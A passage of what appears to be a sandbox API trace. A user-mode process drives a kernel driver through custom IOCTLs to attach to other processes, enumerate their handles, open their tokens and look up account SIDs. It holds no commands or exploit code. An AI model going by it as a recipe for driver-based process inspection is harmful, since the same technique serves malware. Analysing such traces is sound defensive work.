returned 1 [0158.270] CloseHandle (hObject=0xc4) returned 1 [0158.270] CloseHandle (hObject=0xc8) returned 1 [0158.271] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.271] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.271] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.271] PsAcquireProcessExitSynchronization () returned 0x0 [0158.271] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880051635d0) [0158.271] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fe2f20, HandleInformation=0x0) returned 0x0 [0158.271] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.271] PsReleaseProcessExitSynchronization () returned 0x2 [0158.271] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0158.271] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff67c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff67c4, ReturnLength=0xfffff88005163508) returned 0x0 [0158.271] ObfDereferenceObject (Object=0xfffffa8001fe2f20) returned 0x1 [0158.271] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.271] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.272] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.272] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0158.272] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.272] PsAcquireProcessExitSynchronization () returned 0x0 [0158.272] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880051635d0) [0158.272] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800202cbd0, HandleInformation=0x0) returned 0x0 [0158.272] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.272] PsReleaseProcessExitSynchronization () returned 0x2 [0158.272] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0158.272] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.272] ObfDereferenceObject (Object=0xfffffa800202cbd0) returned 0x1 [0158.272] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.272] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.272] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.272] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.272] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.272] PsAcquireProcessExitSynchronization () returned 0x0 [0158.272] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880051635d0) [0158.273] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.273] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.273] PsReleaseProcessExitSynchronization () returned 0x2 [0158.273] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0158.273] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.273] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.273] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.273] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8f4) returned 0xc8 [0158.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.273] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020a3b30, HandleInformation=0x0) returned 0x0 [0158.273] ObOpenObjectByPointer (in: Object=0xfffffa80020a3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.274] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x14 [0158.274] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.274] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.274] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.274] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.274] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.277] CloseHandle (hObject=0xc4) returned 1 [0158.277] CloseHandle (hObject=0xc8) returned 1 [0158.277] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.277] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.278] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.278] PsAcquireProcessExitSynchronization () returned 0x0 [0158.278] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880051635d0) [0158.278] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002065f20, HandleInformation=0x0) returned 0x0 [0158.278] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.278] PsReleaseProcessExitSynchronization () returned 0x2 [0158.278] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0158.278] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.278] ObfDereferenceObject (Object=0xfffffa8002065f20) returned 0x1 [0158.278] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.278] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.278] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.278] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0158.278] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.278] PsAcquireProcessExitSynchronization () returned 0x0 [0158.278] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880051635d0) [0158.279] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002052750, HandleInformation=0x0) returned 0x0 [0158.279] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.279] PsReleaseProcessExitSynchronization () returned 0x2 [0158.279] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0158.279] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.279] ObfDereferenceObject (Object=0xfffffa8002052750) returned 0x1 [0158.279] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.279] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.279] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.279] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.279] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.279] PsAcquireProcessExitSynchronization () returned 0x0 [0158.279] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880051635d0) [0158.279] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.280] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.280] PsReleaseProcessExitSynchronization () returned 0x2 [0158.280] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0158.280] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003205044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003205044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.280] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.280] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.280] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x904) returned 0xc8 [0158.280] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.280] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020a5b30, HandleInformation=0x0) returned 0x0 [0158.280] ObOpenObjectByPointer (in: Object=0xfffffa80020a5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.281] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x14 [0158.281] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.281] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.281] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.281] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.281] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.284] CloseHandle (hObject=0xc4) returned 1 [0158.284] CloseHandle (hObject=0xc8) returned 1 [0158.284] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.284] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.284] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.284] PsAcquireProcessExitSynchronization () returned 0x0 [0158.284] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880051635d0) [0158.284] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001eaa510, HandleInformation=0x0) returned 0x0 [0158.284] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.284] PsReleaseProcessExitSynchronization () returned 0x2 [0158.284] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0158.284] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.284] ObfDereferenceObject (Object=0xfffffa8001eaa510) returned 0x1 [0158.284] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.285] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.285] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.285] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0158.285] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.285] PsAcquireProcessExitSynchronization () returned 0x0 [0158.285] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880051635d0) [0158.285] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020ad670, HandleInformation=0x0) returned 0x0 [0158.285] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.285] PsReleaseProcessExitSynchronization () returned 0x2 [0158.285] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0158.285] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.285] ObfDereferenceObject (Object=0xfffffa80020ad670) returned 0x1 [0158.285] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.285] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.285] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.285] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.285] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.285] PsAcquireProcessExitSynchronization () returned 0x0 [0158.285] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880051635d0) [0158.285] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.285] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.285] PsReleaseProcessExitSynchronization () returned 0x2 [0158.286] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0158.286] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.286] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.286] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.286] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x914) returned 0xc8 [0158.286] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.286] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020c8b30, HandleInformation=0x0) returned 0x0 [0158.286] ObOpenObjectByPointer (in: Object=0xfffffa80020c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.286] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x14 [0158.286] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.286] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.286] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.286] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.286] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.288] CloseHandle (hObject=0xc4) returned 1 [0158.288] CloseHandle (hObject=0xc8) returned 1 [0158.288] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.288] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.289] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.289] PsAcquireProcessExitSynchronization () returned 0x0 [0158.289] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880051635d0) [0158.289] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020bdf20, HandleInformation=0x0) returned 0x0 [0158.289] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.289] PsReleaseProcessExitSynchronization () returned 0x2 [0158.289] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0158.289] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.289] ObfDereferenceObject (Object=0xfffffa80020bdf20) returned 0x1 [0158.289] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.289] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.289] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.289] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0158.289] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.289] PsAcquireProcessExitSynchronization () returned 0x0 [0158.289] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880051635d0) [0158.289] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020c8070, HandleInformation=0x0) returned 0x0 [0158.289] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.289] PsReleaseProcessExitSynchronization () returned 0x2 [0158.289] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0158.290] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.290] ObfDereferenceObject (Object=0xfffffa80020c8070) returned 0x1 [0158.290] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.290] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.290] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.290] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.290] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.290] PsAcquireProcessExitSynchronization () returned 0x0 [0158.290] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880051635d0) [0158.290] 